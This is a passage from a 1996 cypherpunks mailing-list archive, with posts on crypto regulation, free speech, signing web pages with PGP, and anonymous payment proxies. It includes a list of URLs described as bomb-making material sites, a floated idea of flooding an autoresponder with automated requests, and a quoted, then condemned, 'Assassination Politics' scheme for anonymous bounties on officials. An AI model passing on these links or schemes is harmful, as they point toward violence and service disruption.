say, blowing someone's brains out) that member has breached the contract and
can be punished by the government. Similarily, when the government breaks 
the contract (by say, killing off an ethnic minority, or maybe banning 
indecent speech) the government has breached the contract and the 
government may be destroyed. To say that the law is always right because it
is the law, is to defend ethnic cleansing, book burning, detention camps, 
taxation without representation, slavery, and all the other evils 
governments have done, while condeming those who would free slaves or 
fight in revolutionary wars. Making something a LAW does not make it 
right. 
> Is the great strength of the US.
Agreed. Though we must fight to preserve it. 
> >That is why law enforcement is very restricted in the Constitution. 
> Law enforcement is not restricted by the constitution, law *enactment*
> is ("Congress shall make no law...").
Read the fourth amendment. :)
> 
> "Libel" also carries very specific  specifications that must be met. Does 
> anyone here think that a libel suit is a restriction on free speech ?
Most legal limitations (outside of indecency/obsenity) on speech are 
concerned not with the speech itself, but when speech becomes an action.
Yelling fire in a crowded theater is NOT A CRIME. Insiting a riot in 
which hundreds are killed, just for the hell of it, is a crime. 
(Just clarifying)
> 
> Thus it would seem to me to be (not a lawyer or a politician so what do I know
> - we used to have an ordinamce near here requiring alligators to be leashed)
> very difficult to legislate anything concerning crypro since first crypto
> would have to be defined and second it would have to be able to be detected -
> a requirement for all text to be in third-grade flat ASCII won't fly.
A good point, but I don't know if those who want to ban crypto will think 
about it that way. They will assume that it will be obvious who is using 
crypto and who is not. They will leave it to the courts to determine 
what is crypto and what is not. Obviously they are wrong, but thats not 
gunna stop them from enacting laws. Of course, as another person 
responding to my post pointed out, *good* stenography cannot be 
identified, so laws are not gunna stop people from encrypting, it will 
just make it kinda difficult to get away with. 


-- 
        */^\*  Tom Cross AKA Decius 615 AKA The White Ninja  */^\* 
                    Decius@montag33.residence.gatech.edu

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzA6oXIAAAEEAJ6ZWl7AwF9rDZhREQ2b9aPxJKL7dxQNx6QQ0pB5o9olvNtG
tIjA47KxWmZAx47m2JEWRgAIaiDHx00dEza5GX4FuFHL7wSXW7qOtqj7CmVLEg4e
0F/Mx0z7Q/aNsn34JrZUWbMLKkAOOB9sJARRynPRVNokAS30ampImlrLbQDFAAUT
tCZEZWNpdXMgNmk1IDxkZWNpdXNAbmluamEudGVjaHdvb2Qub3JnPg==
=0qgN
-----END PGP PUBLIC KEY BLOCK-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Wed, 7 Feb 1996 06:13:34 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The OCAF's White Paper on Internet Pornography
In-Reply-To: <Pine.LNX.3.91.960206132917.8103C-100000@zifi.genetics.utah.edu>
Message-ID: <199602062117.QAA11149@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


zinc writes:
> regarding this [OCAF] paper;  it's sent out by an autoresponder.  is it 
> illegal to make excessive use of the autoresponder?  this would be a type 
> of denial of service attack.

IMHO scared closed-minded folks such as (apparently) OCAF have every right to
speak too. But on the advice of counsel ;) I am _not_ offering to run an
OCAFmirror hereabouts....

-Lewis	"Don't believe the church and state, and everything they tell you"
		--Mike & the Mechanics




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Wed, 7 Feb 1996 06:54:55 +0800
To: cypherpunks@toad.com
Subject: Houston C'punks meeting
Message-ID: <Pine.OSF.3.91.960206162109.25598A-100000@gaston.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain



If anyone in the Houston area would like to have a meeting this weekend 
or in the near future, let me know.

Dan Harmon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 7 Feb 1996 06:28:54 +0800
To: zinc@zifi.genetics.utah.edu (zinc)
Subject: Re: The OCAF's White Paper on Internet Pornography
In-Reply-To: <Pine.LNX.3.91.960206132917.8103C-100000@zifi.genetics.utah.edu>
Message-ID: <199602062144.QAA29680@homeport.org>
MIME-Version: 1.0
Content-Type: text


zinc wrote:

| i'm wondering if i set up a cron job to request a copy every 5 or 10
| minutes and just send it to /dev/nul, could i get in more trouble than
| say, someone just telling me to cut it out?

I think that they would try to press charges under the precedent that
a guys modem auto-dialing Jerry Falwell's number was forced to make
restitution.   (Forget the reference, sorry.)

The important difference is that they probably are not being billed on
a per transaction basis, whereas 800 numbers are billed per call.
Would they sue?  Can you sell a jury on the essential difference being
that they were not billed per copy mailed?  I'd expect that they'd
react with a 'cut it out' message first.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Tue, 6 Feb 1996 19:14:46 +0800
To: llurch@networking.stanford.edu (Rich Graves)
Subject: Re: Anti-Nazi Authentication [Was: Tim's paranoid rant about Declan...]
In-Reply-To: <Pine.ULT.3.91.960202120722.19670I-100000@Networking.Stanford.EDU>
Message-ID: <199602060545.QAA12048@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Rich Graves <llurch@networking.stanford.edu>
  and bryce@colorado.edu
  and "Declan B. McCullagh" <declan+@cmu.edu>, cypherpunks@toad.com
 
> On Fri, 2 Feb 1996, Bryce wrote:
...
> For the paranoid, it would be an added assurance that they are reading the
> original file at the original location. Otherwise, anybody could copy the
> Web page, modify it, and give it someone else's PGP signature. 
...

So? I guess it's plagiarism, but there's nothing you can do about it
anyway. If someone wants to claim your words, let them sign.

...
> But yeah, it would look awfully silly, especially to the non-PGP-aware
> public. An unobstrusive PGP logo (below) would be great, and might become
> a status symbol, like those cheesy HTML validation service and Internet
> Audit Bureau logos (which I have used on a few pages). 
> 
> > Just put a "PGP signed" logo at the bottom of the
> > page.  If the user clicks on it then it hrefs to a .asc
...
> Yeah, I like the idea of a standardized logo. A lot.

One other thing - what about inline images?

I guess you could put an MD5 hash of the image into the IMG tag,
as a new attribute (you don't necessarily want to sign each of the
images separately).

I'm not sure how to do links, but I guess for the time being you'd
leave them unsigned, with a disclaimer or something on the signature file.

Have a look at http://www.cs.monash.edu.au/~jirib (my home page).
Is that more-or-less what you have in mind?

(Sorry about the cruddy logo - anybody a better artist than I am?)


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMRbq+yxV6mvvBgf5AQHUCgQAscQZb0fq9X+quFmOGGa/7D75yzbYeVjr
IPYDkyHo51Sd+mUUyD8Wt7EtepcVgp5FNEgej0KjjA4gNMbTccZUdp+VoWm0mIDW
qhENaWHvyFZ75+LuyeGqjd3WpvaI2yLzY5+48U5/iBo7XYMNuecZu7cRk+NmhZfv
dEFT4eWUwy4=
=Z14V
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 7 Feb 1996 06:50:38 +0800
To: cypherpunks@toad.com
Subject: Re: The OCAF's White Paper on Internet Pornography
In-Reply-To: <199602062144.QAA29680@homeport.org>
Message-ID: <199602062210.RAA26298@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Feb 6, 16:44, Adam Shostack sent the following to the NSA's mail archives:
> Subject: Re: The OCAF's White Paper on Internet Pornography
|| zinc wrote:
|| 
|| | i'm wondering if i set up a cron job to request a copy every 5 or 10
|| | minutes and just send it to /dev/nul, could i get in more trouble than
|| | say, someone just telling me to cut it out?
|| 
|| I think that they would try to press charges under the precedent that
|| a guys modem auto-dialing Jerry Falwell's number was forced to make
|| restitution.   (Forget the reference, sorry.)
|| 
|| The important difference is that they probably are not being billed on
|| a per transaction basis, whereas 800 numbers are billed per call.
|| Would they sue?  Can you sell a jury on the essential difference being
|| that they were not billed per copy mailed?  I'd expect that they'd
|| react with a 'cut it out' message first.
|| 

And then they would, of course, use the inflated "hit" count as proof positive
that the Internet citizenry is on their side!  

-- 
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060 Fax: (804) 446-9061
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: geoff klein <geoff@commtouch.co.il>
Date: Wed, 7 Feb 1996 05:23:34 +0800
To: cypherpunks@toad.com
Subject: Release of Pronto Secure first Beta
Message-ID: <9602061652.AB19328@commtouch.co.il>
MIME-Version: 1.0
Content-Type: text/plain

-----BEGIN PGP MESSAGE-----
Version: 2.6

owGtVc9vG0UUbopoiyVXQkKCiKq8FKkkKP6V2E7sU+s0CVFlcLEhcOAw3h3vDt6d
WWZm7bhFUCQkiEQFioQ4gqgqxKEgJFSJY08V/AlwgqbqqUVUPVAOwJuxNzVB4VL2
4vHOm+997/vem93c9/H+hycKj38wWft1+/oTj11enph4//eH/qoFZ79+b/+hp366
e+vTu5tPn61sH7v0Jzl34/Dg9Pnm0Yvnyls3ave2FmpbZ45uL320eO/S6uS16+n4
yfOvfK7fPPLbnR/fvT09dfPL7cKVM788cvuTUwcnjj16p/b21IWDr7ov/vHdz4e/
v3D1m8qRD9lXr129+dbFHzaP37p+oPbtxhefvTOYfPbKgcuHjuspt5qLhI5CwoKc
iLUnGPdyofLKhfniXBYX+/Cps5BmXqZSMcGrUMjm06klwTXlOtMaRLQKmm7oXBQQ
xsd2JOGqQ2VmmTvCRdgqLLSZTqfSqZaogjOIfCqjmHfVCS2Im3VEmE6dIhrhWjGF
FdqGfBkKlWphrloyi0rZnF0SYahF7PjgEwUudZhLXdACRAeTAQEH80sR4EtJA0oU
xR1oSHwroEmdWFITrX0KCLZDAo+FYcyZHmRhnUIbj7IeRvpEg3JkrBkfGCBzLpLC
jR0N7QGENGyjLmYnndI+UxAwpaHPggB8GkQQK5MtYUJAkQ7+cBfUkMpyxkgPTsBQ
s6wp8J9UEZFwWENJJacaw+v3w6EjJKwz7oq+moW+z1CUWFEF6AaGkwA52TRYlSHd
Q6mk5UO5T7hDgQ6z95n2wZGDSAtPkgiBYOdchxKNRFQWwVpYPL6WJnebagK9YU+Y
+hjmxdVInx7lYxDEYQHTNgKtWG0YCunUiBGSsakRZxZIjABcM4cM/zMs3LMgRrMu
RcUJJx4NbfkJtXRqJTarhI8aGsC4E8SYoJkzDWwR6i80m8bqKGBGgERwa6ekb8RM
WmhVRX4ZqDczI3lhPluAXCL2UHghu54UcWQ3x3crpbE/z7cMEv5TwukOI5P8Gkvv
MbTbVjPdWmrk1hqgNHG6M+bQGsd1YDo50Xkon2WNTYoDx42UIenSXR1OeugraQco
CSOw0moA9rHxhqIIto2xsfqUdo2tDSKtOUZslFNjQsbhdbwKcGrtKWN2RuOW8RZb
JARiehPZ6+HwKYMbmpGKvCijmMfx/ai7jK541GChIjzAYcejSksU3ZpljBGxhChu
B9h6xmUjcDo13g0jJiMlslBLKJmW7vsiaXAzcbafO5S6mTZqOWyGdKqN1QfMY0YV
O5OOHXECHUkpdJgZmGRQd9I0hZQD4AJaGeUzqXHQ2rFGtD4FLyZmFOjomhiI+BlM
5OGYhgLl6VMisS797/unOmMtRI8f9EmnVilefHAarysOez7UGFFFahh7wkluULxy
syy4PwB1O1oSMrvo2sfXOqqaRS7X7/ez4yDh/1KIudhb9mJvrmPrO7MAL2Wbe9e0
Ez8La0oSGgC6UpjDb8Z6Fp5Dy5VL0Ola0HP3BinkoUUdn4tAeAM4ie2AIE0cqzp+
iMSszXMSKsVifn5vkGWUHr+O1MX4Yr5cKRuQFg2sXNPFQmkGSguLmXJpMb83iI2v
LMxNV2Yq5flisWRAVsjGLpDF/wSx8QlIIV+aNyAP7M3f
=64dh
-----END PGP MESSAGE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <wilcoxb@nag.cs.colorado.edu>
Date: Wed, 7 Feb 1996 10:50:54 +0800
To: declan+@cmu.edu
Subject: Web Page Authentication (was: Anti-Nazi Authentication)
In-Reply-To: <199602060545.QAA12048@sweeney.cs.monash.edu.au>
Message-ID: <199602070204.TAA14469@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 An entity calling itself Jiri Baum 
 <jirib@sweeney.cs.monash.edu.au> probably wrote:

> Hello Rich Graves <llurch@networking.stanford.edu>
>   and bryce@colorado.edu
>   and "Declan B. McCullagh" <declan+@cmu.edu>, cypherpunks@toad.com
>  
> > On Fri, 2 Feb 1996, Bryce wrote:
> ...
> > For the paranoid, it would be an added assurance that they are reading the
> > original file at the original location. Otherwise, anybody could copy the
> > Web page, modify it, and give it someone else's PGP signature. 
> ...


No I didn't.  That was Rich I think.


> So? I guess it's plagiarism, but there's nothing you can do about it
> anyway. If someone wants to claim your words, let them sign.


What *I* wrote was some ways that you *could* do something
about it, namely PGP clearsigs and and timestamps.  I have
the disheartening impression that my e-mail hasn't been
delivered properly for the last couple of weeks.  That, or
nobody is listening to me.


> One other thing - what about inline images?
> 
> I guess you could put an MD5 hash of the image into the IMG tag,
> as a new attribute (you don't necessarily want to sign each of the
> images separately).
 

That's a good idea.  Of course you already have signed the
URL, which is supposed to be universal.  However someone
*could* hijack the http requests and shove the wrong images
into your "PGP signed" document.  This could stand some more
thought.  I like your MD5 idea, but that isn't as easy to
implement and distribute.


Most graphic file formats can have inert embedded comments.
We could stick the URL at which the file should be found,
along with a whole PGP sig of that URL and the graphic
data.  Then, since we have that URL signed, and we have the
URL for the inline image in the html file signed, we can
match the two together and be safe except for some really
funky replay attacks.  (Which you can avoid by never storing
a file at an URL which once held a different file.)


Hm.  Your MD5 hashes sound like a better idea.  :-)


> I'm not sure how to do links, but I guess for the time being you'd
> leave them unsigned, with a disclaimer or something on the signature file.


Umm..  Hm.  What do you mean?  The text of the hrefs would
be signed since it is part of the html document.  Hopefully
it would be intuitively obvious to the most casual user that
if you are reading a file signed by X, and you click on an
URL and go to another file, that the new file is not
necessarily signed by X.  :-)


> Have a look at http://www.cs.monash.edu.au/~jirib (my home page).
> Is that more-or-less what you have in mind?


Nice!  If you want you can have copies of the graphics in
"http://www-ugrad.cs.colorado.edu/~wilcoxb/images/pgpcheck".


I think they should say "signed" rather than "verified"
since they haven't been verified until the user actually
runs PGP on them.  Let me know if you want variations on the
images there-- I'll cook them up and give them to you.


Sorry for snapping at you at the beginning of this message--
I'm was just in a bad mood and I hate having things
mis-attributed to me.


Regards,

Bryce

                 "Toys, Tools and Technologies"
  the Niche 
        New Signal Consulting -- C++, Java, HTML, Ecash
            Bryce 
 
PGP sig follows



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMRgIZPWZSllhfG25AQHvBQP+LHZRIeNPujzmooJMOLHnmvnojtQNGzNe
ttYUykeS47wT/ack2TS0pD3oYrvu0vUsD7A2dMON0rgDlzsx/GMIcteqFxE0Hkg/
64SLl9JO+SI43/1MU0hBI3PJppOzIIzxtQaWvIQbBz5zajDf8I60Fe69KK91q5sj
Q6c871kjtV4=
=dDpO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Wed, 7 Feb 1996 11:58:42 +0800
To: cypherpunks@toad.com
Subject: CDA = death of crypto
Message-ID: <199602070326.TAA28004@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


CDA means that virtually all underground or 'illegal' traffic will be
distributed via encryption.

As soon as the loony right and fundo Christians realise this, they *will*
call for legislation against encryption, and if the CDA is any benchmark,
they will easily win.

My 0.2 cents worth for the day.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Philip L. Dubois" <dubois@dubois.com>
Date: Wed, 7 Feb 1996 11:26:33 +0800
To: cypherpunks@toad.com
Subject: Zimmermann Legal Defense Fund
Message-ID: <199602070236.TAA13753@teal.csn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

*

MESSAGE FROM ZIMMERMANN DEFENSE TEAM

FOR IMMEDIATE WIDE DISTRIBUTION WITHOUT MODIFICATION

I write on behalf of Philip Zimmermann and his legal defense team 
for two reasons:  to offer thanks and to make an announcement.  

First, we offer our thanks to all the generous souls who donated 
money and services to the Zimmermann Legal Defense Fund.  Without 
you, we could not have mounted the defense that we did, and we 
would not have achieved the result that we did.  Your contributions
were made from a commitment to the causes of privacy and justice,
and we are grateful.

The announcement:  as you may know, I am the only lawyer who 
was not working pro bono, i.e., without expectation of being 
paid.  Three of our lawyers-- Ken Bass in D.C., Eben Moglen in New 
York, and Curt Karnow in San Francisco-- devoted hundreds of 
hours of time and substantial expenses for which they've not been 
paid.  Tom Nolan in Palo Alto and Bob Corn-Revere in D.C. also 
spent a great deal of time on this case for which they were not 
paid.  And, of course, Joe Burton in San Francisco toiled in 
obscurity on behalf of the other person who was also targeted by
the federal investigation.

I agreed up front not to bill for all my time, and judging from 
the rate of current contributions, it now appears that the Defense 
Fund will cover the fees and costs that I billed.  I would like to 
see these other lawyers receive some compensation for their efforts.
Accordingly, all donations to the Zimmermann Legal Defense Fund 
mailed, authorized, or generally "made" (as opposed to "received") 
after midnight local time on 14 February 1996 will be distributed
among these other lawyers to defray their costs and, if possible, 
to compensate them for a little of their time.

I make this announcement because people contributing to the Fund 
have a right to know that Mr. Zimmermann's actual defense costs 
are now covered and that additional donations will go to lawyers 
who agreed to work for free and who were absolutely essential to 
the defense.

Again, my thanks.


Philip L. Dubois
Counsel for Philip Zimmermann
Philip L. Dubois, P.C.
2305 Broadway
Boulder, CO  80304-4106
voice:  303-444-3885
fax:  303-444-1051
email:  dubois@dubois.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMRgCUbZ7C+AHeDONAQGJAAP+N82RobbmbRVljdE7t0tGEcfCeHN+pqwF
+j31GjZU3qDNBtgXw30yTJSKOOjkg9fBRicNIQPsLarkTGDTYWUk2JSNcUVgNZiO
/AjM/BnIjwms81DuGR1KivlMlw6lnhK46ncT4ijx5tMj2b8QaHiwkkwxznY3FTXi
bNlo5J06cFA=
=D12f
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Don <don@cs.byu.edu>
Date: Wed, 7 Feb 1996 11:39:48 +0800
To: cypherpunks@toad.com
Subject: Re: FV's blatant double standards
In-Reply-To: <cl5nmoeMc50eIYnJg9@nsb.fv.com>
Message-ID: <ML-2.0.823661761.3978.don@wero.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Nathaniel Borenstein of FV (not accepted at c2, by the way) said:

> point is that an automated attack like this one is undermined by email
> heterogeneity, which will cause FV's fraud department to be alerted

Is that the same sort of "alerted" that would happen when a keyboard-sniffer-
detecter detects a keyboard-sniffer? Or is it the kind of alerted like
"The keyboard sniffer program was alerted by the OS that it could kiss
off if it wants access to the keyboard"

Or is it something entirely different, like "The government was alerted
that someone was buying a few too many plane tickets to [foreign coutry here]"

Don




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 7 Feb 1996 18:47:08 +0800
To: cypherpunks@toad.com
Subject: Re: Fax Fools US Espionage
In-Reply-To: <199602070054.BAA11802@utopia.hacktic.nl>
Message-ID: <199602070110.UAA01084@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> 
> "Foolproof" Encrypted Fax System

More like "system created by fools"

> The encryption system, meanwhile, uses a proprietary, but
> open systems standard of encryption,

I love the doublespeak..

> using a one-time
> passkey, which is transmitted by the sending fax device
> in a secure manner.

How can a one-time pad be transmitted securely? Sounds like crap to
me. Anyone know details?

> "This contrasts with the French/German system which is
> based on RSA's private and public key system. That system
> is flawed, since it relies on the US Government licensing
> a manufacturer to use the algorithm,

I'm sure Jim Bidzos would be amused to hear that.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Wed, 7 Feb 1996 10:27:21 +0800
To: cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <199602070213.UAA03036@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 06 Feb 1996 15:43:12 -0800
> From: jim bell <jimbell@pacifier.com>
> Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I
>   wrong?
> 
> [Part 1]
> I've been following the concepts of digital cash and encryption, since
> I read the article in the August 1992 issue of Scientific American on
> "encrypted signatures."  While I've only followed the Digitaliberty area
> for a few weeks, I can already see a number of points that do (and
> should!) strongly concern the average savvy individual:
> 
> 1.  How can we translate the freedom afforded by the Internet to
> ordinary life?
> 

By realizing that freedom is freedom, the medium is irrelevant.

> 2.  How can we keep the government from banning encryption, digital
> cash, and other systems that will improve our freedom?
> 

By making shure they don't have the authority to make the decision in the
first place.

> A few months ago, I had a truly and quite literally "revolutionary"
> idea, and I jokingly called it "Assassination Politics": I speculated on
> the question of whether an organization could be set up to _legally_
> announce either that it would be awarding a cash prize to somebody who
> correctly "predicted" the death of one of a list of violators of
> rights, usually either government employees, officeholders, or
> appointees.  It could ask for anonymous contributions from the public,
> and individuals would be able send those contributions using digital
> cash.
> 

If the intent is to motivate others to kill or otherwise harm others simply
because you don't agree with them or their actions is reprehensible and
moraly or ethicaly undefensible.

> 
> On the contrary; my speculation assumed that the "victim" is a
> government employee, presumably one who is not merely taking a paycheck
> of stolen tax dollars, but also is guilty of extra violations of rights
> beyond this. (Government agents responsible for the Ruby Ridge incident
> and Waco come to mind.)  In receiving such money and in his various
> acts, he violates the "Non-aggression Principle" (NAP) and thus,
> presumably, any acts against him are not the initiation of force under
> libertarian principles.
> 

Every citizen of this country is a 'government employee' in one sense or
another.

By resorting to violence you are no better than the ones you proport to
protect us against.

                                              Jim Choate
                                              ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 7 Feb 1996 18:44:04 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Sometimes ya just gotta nuke em
In-Reply-To: <m0tjaYV-0004M0C@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SV4.3.91.960206201249.22478B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> : of the Pacific when the Nisei troops choosenot to surrender and instead, 
> 
> Who were those second generation Japanese Americans who ``choosenot to
> surrender and instead, mad last-ditch charges against AMerican lines''?


   Strike that. Insert "Nippon".   Don't blame me, I went to public schools.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 7 Feb 1996 10:47:06 +0800
To: cypherpunks@toad.com
Subject: Re: Likely application for high-bandwidth proxies (fwd)
Message-ID: <01I0WNMJAAFQA0UVSI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: lmccarth@cs.umass.edu

>This makes it harder for transitory proxies, but not for fairly permanent
ones, I suspect. An outfit like C2 could presumably register with a corporate
credit card. Its proxy then carries connections paid-as-you-go with e$, or
paid in chunks in advance with a check.
-------------------
	That could work with a known amount of charge, which the person would
pay to the proxy (or some portion of it). A very interesting idea.
	But how about the larger idea of anonymnity (such as through an
organization with anonymous account access) with _general_ access to a
corporate credit card? You'd need to either A. have knowledge of the users
(what I'd call semi-anonymous) or B. get the price of what the person is
purchasing at the time and subtract it from their account. The latter seems
possible with the FV system, so long as it records enough info to distinguish
who's using what so the appropriate account can be charged for it (the system
would allow a yes answer only if the account had enough money to pay for it).
One would need to know in any case at each point when a given account charged
something. This might work via not telling the user the CC/FV number is (which
one would want to do in any case) and logging which account used something
when. One could use multiple credit cards (with multiple fees, unfortunately)
and rotate them around from account to account every day or so (whatever the
finest grain distinguishable by the card report was). I wonder how much info
gets reported back on corporate credit cards to the corporation issuing them.
Any information or suggestions? In general, the problem is finding out what
nym is charging what.
	Another way to do it, but an unpopular one, would be to have a required
deposit equal to the credit limit available on the card. This limit could be
checked on a regular basis (a phone call, hopefully automatable, to the credit
card issuer) and adjusted appropriately.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 7 Feb 1996 11:16:48 +0800
To: bplib@wat.hookup.net
Subject: Re: Fair Credit Reporting Act and Privacy Act
Message-ID: <01I0WOIQESFIA0UV0C@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bplib@wat.hookup.net"  "Tim Philp"  6-FEB-1996 09:02:48.98

>It would not make it harder for buyers and sellers to get together, it 
would simply increase the risk. It may lead to higher prices, but I am 
prepared to pay something to protect my privacy.
------------^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^------------------------

> If you don't want people to know things about you, don't tell them.
> 
I agree that in the absolute sense, this is true. However, it is not 
practical to do so in our modern society. If you are prepared to live 
without credit or health insurance you can do this but the price is too
high for most people to consider.                      ^^^^^^^^^^^^^^^^
^^^^-------------------------------------------------------------------
	So you're prepared for everyone to pay more, but not for those who
want privacy to pay more? While I do support taxes to pay for a minimal amount
of welfare, I don't think that much intrusion into private property rights is
justified.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stainles@bga.com (Dwight Brown)
Date: Wed, 7 Feb 1996 12:03:23 +0800
To: cypherpunks@toad.com
Subject: DES for HP48?
Message-ID: <v01530500ad3dccc19688@[204.251.33.56]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

When the RC4 implimentation for the HP48 was posted, someone else mentioned
the existence of a DES implimentation for the same machine. I remember
seeing this mentioned on the list earlier as well, but...

I've done searches with Archie, Alta Vista and Yahoo, as well as looking
through the excellent hks.net archives, but I haven't been able to find it.

Can someone point me in the right direction?

(Since I'm probably just too stupid to construct a proper Yahoo search, and
to keep list noise down, I'll sumarize privately e-mailed responses.)

==Dwight
-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBMRgdEYY4AzhdF11FAQGrEwP6Aq+oTEOsss6XR30ra/Ft0fYtRJi0BW7+
KNw8Fx3C+s/ekBn+PmGbprsiDk3NBCzpNvZPylwCrmRrh71bu2ZUK/ZTkmJVDr56
7rFKoW0PL8KOZ9E58+u7NB2p/XuHRgtfTZgkEt2WvuPP/lgmVUPwUYSTg01fC+tN
yPEZgQnLUKM=
=WBl3
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 7 Feb 1996 11:36:12 +0800
To: cypherpunks@toad.com
Subject: Anti-US-censorship ammunition
Message-ID: <01I0WPDDTPHSA0UWEC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	I received the following addresses from my request for non-US
bomb-making material sites. (I'll post who gave them to me if he gives me
permission). They should be useful as arguments against anyone who claims the
US should shut off such information.
	-Allen

http://www.mi.aau.dk/~clement/thb_title.html

http://home.ptd.net/~wa2joc/terror.hb

http://www.tvnorge.no/~thomasm/terror.htm

http://www.cis.ksu.edu/~psiber/fortress/ter5ror/main.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Wed, 7 Feb 1996 14:41:29 +0800
To: remailer-operators@c2.org (Remailer Operators List)
Subject: Infoterrorism paper
In-Reply-To: <199602070416.XAA14183@opine.cs.umass.edu>
Message-ID: <199602070614.WAA11621@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


Thanks, Futplex, very much for the heads-up on this document. Indeed it
is fascinating, and I feel quite validated. The discussion of the quality
of my service was particularly heartening - I'll put it on the remailer
list page if I decide to go for the publicity angle.

I'm also a bit concerned about a possible appropriation of my work. I am
especially concerned about the fact that it does not give attribution.
The quotations of my remailer page probably go beyond any reasonable 
standard of fair use, either legally or according to Net tradition.

For the time being, I'd like to lay low and not create too much smoke
until I figure out what to do. Of course, given that the URL has been
published on cypherpunks, there may not be that much that can be done
about it.

Raph






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 7 Feb 1996 12:06:16 +0800
To: lmccarth@cs.umass.edu
Subject: Re: Anti-US-censorship ammunition
Message-ID: <01I0WQNVJOX4A0UWEJ@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"lmccarth@cs.umass.edu"  6-FEB-1996 22:24:29.09

> 	I received the following addresses from my request for non-US
> bomb-making material sites. 
[...]
> http://www.cis.ksu.edu/~psiber/fortress/ter5ror/main.html

When did Kansas secede from the Union ?  :>
--------------
	Thank you for pointing out my error. I forgot to delete that line.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Wed, 7 Feb 1996 12:16:00 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: How to prevent a virus infection :-)
